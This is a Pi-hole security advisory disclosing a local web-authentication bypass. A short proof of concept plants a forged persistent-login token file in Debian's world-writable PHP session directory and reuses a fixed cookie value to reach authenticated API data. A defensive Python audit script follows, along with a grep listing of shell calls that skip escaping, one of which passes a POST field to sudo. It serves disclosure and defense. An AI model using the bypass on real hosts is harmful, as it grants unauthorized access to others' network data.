
Pi-hole: Web Authentication ByPass

High
rcorrea35 published GHSA-3658-w6j3-w42r Sep 6, 2024

Package

Pi-hole (Debian)

Affected versions

v5.18.3 v5.18.4 v5.19 v5.20 v5.20.1 v5.20.2 v5.21

Patched versions

None

Description

Summary

Web authentication bypass with local system access via world writable permissions.

Severity

High - Allows attackers to bypass web authentication.

Proof of Concept

Local System Users can bypass Web Interface Authentication

A local user who is neither root nor the pihole user can write to /var/lib/php/sessions and thereby bypass the web interface's login page.

root@2f496b742755:/# apt update && apt install curl -y
root@2f496b742755:/# useradd -m -s /bin/bash test
root@2f496b742755:/# su - test
test@2f496b742755:~$ curl 'localhost/admin/api.php?status&versions='
{"core_update":false,"web_update":false,"FTL_update":false,"docker_update":false,"core_current":"v5.17.1","web_current":"v5.20.1","FTL_current":"v5.23","docker_current":"2023.05.2","core_latest":"v5.17.1","web_latest":"v5.20.1","FTL_latest":"v5.23","docker_latest":"2023.05.2","core_branch":"master","web_branch":"master","FTL_branch":"master"}
test@2f496b742755:~$ curl -b "persistentlogin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 'localhost/admin/api_db.php?status&network='
test@2f496b742755:~$ UMASK=0777 echo 1689793078 > /var/lib/php/sessions/ph_plt_aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.txt
test@2f496b742755:~$ curl -b "persistentlogin=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 'localhost/admin/api_db.php?status&network='
{"network":[{"id":1,"hwaddr":"02:42:28:c7:59:64","interface":"eth2","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["172.18.0.1"],"name":[""]},{"id":2,"hwaddr":"00:00:00:00:00:00","interface":"lo","firstSeen":1689191102,"lastQuery":1689191140,"numQueries":4,"macVendor":"virtual interface","aliasclient_id":null,"ip":["127.0.0.1"],"name":["localhost"]},{"id":3,"hwaddr":"02:42:0a:00:05:03","interface":"eth1@if127","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["10.0.5.3"],"name":[""]},{"id":4,"hwaddr":"02:42:ac:12:00:03","interface":"eth2@if129","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["172.18.0.3"],"name":[""]},{"id":5,"hwaddr":"02:42:0a:00:00:0f","interface":"eth0@if131","firstSeen":1689191102,"lastQuery":0,"numQueries":0,"macVendor":"","aliasclient_id":null,"ip":["10.0.0.15"],"name":[""]},{"id":6,"hwaddr":"02:42:0a:00:00:06","interface":"eth0","firstSeen":1689191160,"lastQuery":1689191146,"numQueries":3,"macVendor":"","aliasclient_id":null,"ip":["10.0.0.6"],"name":[""]},{"id":7,"hwaddr":"ip-::","interface":"N\/A","firstSeen":1689191160,"lastQuery":1689191140,"numQueries":14,"macVendor":"","aliasclient_id":null,"ip":["::"],"name":["pi.hole"]}],"message_count":0}

From the Chrome console a user can simply set a persistentlogin cookie to "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" and refresh the page.
(screenshot: poc_web)

Note that it is the Debian php package itself that makes /var/lib/php/sessions world-writable:

root@f612b9a22be3:/# apt update && apt install php -y 
root@f612b9a22be3:/# ls -ld /var/lib/php/sessions/
drwx-wx-wt 2 root root 4096 Jul 13  2022 /var/lib/php/sessions/
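As an added defender-side check (not Pi-hole's or Debian's own code), the script below audits a PHP session directory for the two conditions the advisory describes: a world-writable directory, and ph_plt_<token>.txt files not owned by the web server uid, which Pi-hole alone should be creating. It assumes the file naming and directory mode shown above and builds a constructed throwaway sample directory so it runs offline.

```python
import os
import stat
import tempfile
from pathlib import Path


def audit_session_dir(session_dir, web_uid):
    """Return (severity, message) findings for one PHP session directory.

    Two checks, both taken from the advisory: the directory itself must not be
    world-writable, and every persistent-login token file (ph_plt_<token>.txt)
    must be owned by the web server uid, since Pi-hole is the only legitimate
    writer of those files.
    """
    findings = []
    d = Path(session_dir)
    mode = d.stat().st_mode
    if mode & stat.S_IWOTH:
        findings.append(("HIGH", f"{d} is world-writable ({stat.filemode(mode)}): "
                                 "any local user can plant a token file"))
    for f in sorted(d.glob("ph_plt_*.txt")):
        uid = f.stat().st_uid
        if uid != web_uid:
            findings.append(("HIGH", f"{f.name} is owned by uid {uid}, not the web "
                                     f"server uid {web_uid}: possible forged token"))
    return findings


def build_constructed_sample():
    """Constructed sample, not a real system: a throwaway directory with the
    Debian mode from the advisory (drwx-wx-wt, 1733) and one planted token
    file named after the PoC cookie value."""
    d = Path(tempfile.mkdtemp(prefix="pihole-sessions-"))
    d.chmod(0o1733)
    (d / ("ph_plt_" + "a" * 32 + ".txt")).write_text("1689793078\n")
    return d


def demo():
    """Audit the sample twice: treating the current user as the web server
    (only the directory finding fires) and treating another uid as the web
    server (the planted file is flagged as well). Returns both lists."""
    d = build_constructed_sample()
    me = os.getuid()
    return audit_session_dir(d, me), audit_session_dir(d, me + 1)


if __name__ == "__main__":
    as_webserver, as_other = demo()
    for sev, msg in as_webserver + as_other:
        print(sev, msg)
```

On a real Debian host, call audit_session_dir("/var/lib/php/sessions", pwd.getpwnam("www-data").pw_uid) to check the live directory.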

Further Analysis

Most system calls go through pihole_execute(), which wraps the command in escapeshellcmd(). A few system calls, however, are made without escapeshellcmd():

# grep exec\( -R AdminLTE/*.php | grep -v pihole_execute | grep -v stmt
AdminLTE/settings.php:    $timezone = shell_exec("date +'%Z'");
AdminLTE/settings.php:    $FTLversion = exec('/usr/bin/pihole-FTL version');

# grep exec\( -R AdminLTE/scripts/pi-hole/php/*.php  | grep -v '$db'
AdminLTE/scripts/pi-hole/php/func.php:    exec($command, $output, $return_status);
AdminLTE/scripts/pi-hole/php/func.php:    return shell_exec('pidof pihole-FTL');
AdminLTE/scripts/pi-hole/php/func.php:    return trim(exec('ps -p '.$FTLpid.' -o '.$arg));
AdminLTE/scripts/pi-hole/php/header_authenticated.php:$nproc = shell_exec('nproc');
AdminLTE/scripts/pi-hole/php/savesettings.php:                    exec('sudo pihole -a theme '.$_POST['webtheme']);
AdminLTE/scripts/pi-hole/php/teleporter.php:        exit('cannot open/create '.htmlentities($archive_file_name)."<br>\nPHP user: ".exec('whoami')."\n");

Timeline

Date reported: 07/14/2023
Date fixed:
Date disclosed: 09/06/2024

Severity

High

CVE ID

No known CVE

Weaknesses

No CWEs

Credits